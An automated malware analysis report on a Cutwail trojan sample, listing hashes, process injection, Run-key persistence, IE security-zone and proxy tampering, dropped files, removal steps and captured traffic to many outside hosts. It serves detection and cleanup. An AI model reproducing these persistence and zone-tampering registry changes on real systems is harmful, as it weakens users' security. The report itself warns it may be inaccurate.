Trojan.Win32.Cutwail.chu (Kaspersky), Gen:Variant.Zusy.80539 (B) (Emsisoft), Gen:Variant.Zusy.80539 (AdAware), GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 368c6271e7c7a0b02a0daa256a2aa283
SHA1: 88c782c4ec6e4456a649d61c863b79a41d57af73
SHA256: 3b9f5ce74cf866baf9a2a209d0ad4b3c25fd85728c0157a2806b011f177dc7b5
SSDeep: 768:4TbKtBVOrAHIR5/fNQuYMqV76ckaZ9Yz2WjEIFoE3AwkV5u9:ZVaz3/fNUVfkarYs 3AwyE9
Size: 48128 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Rapiddown
Created at: 2014-01-16 13:34:07
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1880
The Trojan injects its code into the following process(es):
JRY7B2.tmp:3796
svchost.exe:1876
svchost.exe:2960
File activity
The process %original file name%.exe:1880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
The process JRY7B2.tmp:3796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
Registry activity
The process %original file name%.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement" = "7A 52 2A 02 D9 25 FC D4 AC 84 5C 34 0C 57 2F 07"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"zygyspypjyslzap" = "B6 8E 66 3E 89 61 39 11 E8 C0 98 70 BB 93 6B 43"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A A8 EB FC 62 9B 3E 7E DE 90 9D EF DE EE 8E 87"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"ShellPrime" = "F5 B1 58 71"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zygyspypjysl" = "%Documents and Settings%\%current user%\zygyspypjysl.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zygyspypjysl"
The process JRY7B2.tmp:3796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\E5215D3460C2C20BBE2D9FE5FB665DAA2C0E225C]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 6F 7E 74 A3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement" = "A8 80 58 30 08 DF B7 8F 67 3F 17 EE C6 9E 76 C1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 86 46 3B DF 0F 73 D7 A8 65 AD B9 5C 26 80 FE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"sufkywiddeaxzap" = "88 60 38 10 E7 BF 97 6F 47 1F F6 CE A6 7E 56 2E"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"sufkywiddeax" = "%Documents and Settings%\%current user%\sufkywiddeax.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates]
"E5215D3460C2C20BBE2D9FE5FB665DAA2C0E225C"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"ShellPrime"
Dropped PE files
MD5 | File path |
---|---|
0a0dcf2f3b12bc676ca93e49b573690d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\JRY7B2.tmp |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1880
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\detanses[1].htm (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\index[1].htm (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\teknorhino[1].htm (15 bytes)
%Documents and Settings%\%current user%\zygyspypjysl.exe (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\cgc-england[1].htm (13 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@screaminpeach[1].txt (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigjohnsbeefjerky[1].txt (241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\safetyconnection[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\sortedorganizing[1].htm (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@plus[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\hostphd.com[1].htm (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\JRY7B2.tmp (62 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (881 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@genmar.gen[1].txt (225 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@altonhousehotel[1].txt (237 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@traderush[1].txt (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\biurimex[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lucion[1].htm (14 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@shipeliteexpress[1].txt (239 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@stepnet[1].txt (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\combine.or[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\slf6E4C.tmp.bat (123 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (10020 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tavdi[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\suspendedpage[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\empordalia[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\slcago[1].htm (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\churchclothes[1].htm (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\combine.or[1].htm (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigtopmultimedia[1].txt (239 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sdlp[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\sydney[1].htm (357 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@taykon[1].txt (219 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@istanbultarim.com[1].txt (239 bytes)
%Documents and Settings%\%current user%\sufkywiddeax.exe (62 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\empordalia[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@racknstackwarehouse.com[1].txt (251 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\aciuba.com[1].htm (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (49 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@wsipowerontheweb[1].txt (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\lucion[1].htm (14 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@theautospas[1].txt (230 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (49 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@starmedia[1].txt (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\easyformations[1].htm (19 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@goodvaluecenter[1].txt (237 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@neurotoxininstitute[1].txt (246 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\detanses[1].htm (197 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cbsprinting.com[1].txt (235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\solutioncorp[1].htm (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\brijindia[1].htm (28 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@golfpark-moossee[1].txt (281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\sarpy[1].htm (20 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@teasing-video[1].txt (233 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@paintball[1].txt (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\authentica-travel[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\403[1].htm (883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\mibsga[1].htm (619 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\bigtopmultimedia[1].htm (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@telenavis[1].txt (225 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doctsf[1].txt (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lockerlookz[1].htm (29 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@westhillsstl[1].txt (232 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ctr4process[2].txt (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\lexjuridica[1].htm (3 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zygyspypjysl" = "%Documents and Settings%\%current user%\zygyspypjysl.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"sufkywiddeax" = "%Documents and Settings%\%current user%\sufkywiddeax.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 602 | 1024 | 2.78109 | 113a7c284fcf4456308de7027b6ee820 |
.rdata | 8192 | 140 | 512 | 0.928075 | d2db33f388ee0b37fe18425ddae4394a |
.data | 12288 | 127 | 512 | 0.496935 | 3b95829f707498578661cb234d47259d |
.rsrc | 16384 | 44608 | 45056 | 5.12094 | d25dfb3c65a8834eb9e88372fdf29552 |
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: nanfangcw.com
Connection: Keep-Alive
Cache-Control: no-cache
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 219
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dotnetpia.co.kr
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=euc-kr
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ob025wlspo40ycyzbxo5ztlb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 12 Apr 2014 14:42:08 GMT
Content-Length: 21278
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 47
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: differentimages.nl
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Permanently
Date: Sat, 12 Apr 2014 14:41:55 GMT
Server: Apache
location: hXXp://ww1.differentimages.nl
X-Powered-By: PleskLin
Content-Length: 0
Connection: close
Content-Type: text/html
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 550
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: victoria.com.pl
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 171
Content-Type: text/html
Date: Sat, 12 Apr 2014 14:40:16 GMT
Server: IdeaWebServer/v0.80
<HTML>.<HEAD>...<TITLE>403 Forbidden</TITLE>..</HEAD>.<BODY BGCOLOR=#FFFFFF>...<H1>403 Forbidden</H1>..You don't have permission to access this document...</BODY>.</HTML>...
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.teknorhino.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 12 Apr 2014 14:41:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
<<< skipped >>>
GET /sydney/ HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.optiver.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:41:43 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 558
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: bigjohnsbeefjerky.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: cloudflare-nginx
Date: Sat, 12 Apr 2014 14:40:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d09eade82e09a5211bd069a69b61571511397313626760; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.bigjohnsbeefjerky.com; HttpOnly
Cf-Railgun: direct (starting new WAN connection)
Location: hXXp://VVV.bigjohnsbeefjerky.com/
CF-RAY: 11a02dd743dc0098-IAD
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 534
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: lexjuridica.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:41:49 GMT
Server: Apache
X-SERVER: 33
Last-Modified: Fri, 04 Oct 2013 22:24:11 GMT
ETag: "e130f2-f8b-4e7f1c2f7d8c0"
Accept-Ranges: bytes
Content-Length: 3979
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 550
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thesergery.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.0 400 Bad request: request method denied
Content-type: text/html; charset="utf-8"
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.bocr.cz
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:42:01 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7 squeeze19
Set-Cookie: PHPSESSID=egubaa30odv4qq09os7mpkorj5; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 528
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: shipeliteexpress.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 503 Service Temporarily Unavailable
Server: cloudflare-nginx
Date: Sat, 12 Apr 2014 14:40:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d82c29802f4da99df986786ea85b242221397313645850; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.shipeliteexpress.com; HttpOnly
Cache-Control: max-age=5
Expires: Sat, 12 Apr 2014 14:40:50 GMT
CF-RAY: 11a02e4e9a93087a-IAD
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: slcago.org
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:40:15 GMT
Server: Apache
Last-Modified: Thu, 08 Aug 2013 22:47:13 GMT
ETag: "21c5f-190-4e37770631e40"
Accept-Ranges: bytes
Content-Length: 400
X-Powered-By: PleskLin
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<title>American Guild of Organists</title>.<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />.<meta http-equiv="refresh" content="0;url=hXXp://VVV.slcago.org/main01/" />.</head>..<body>.</body>..</html>...
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 566
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: robertmcintyre.com.au
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 12 Apr 2014 14:40:26 GMT
Content-Length: 1233
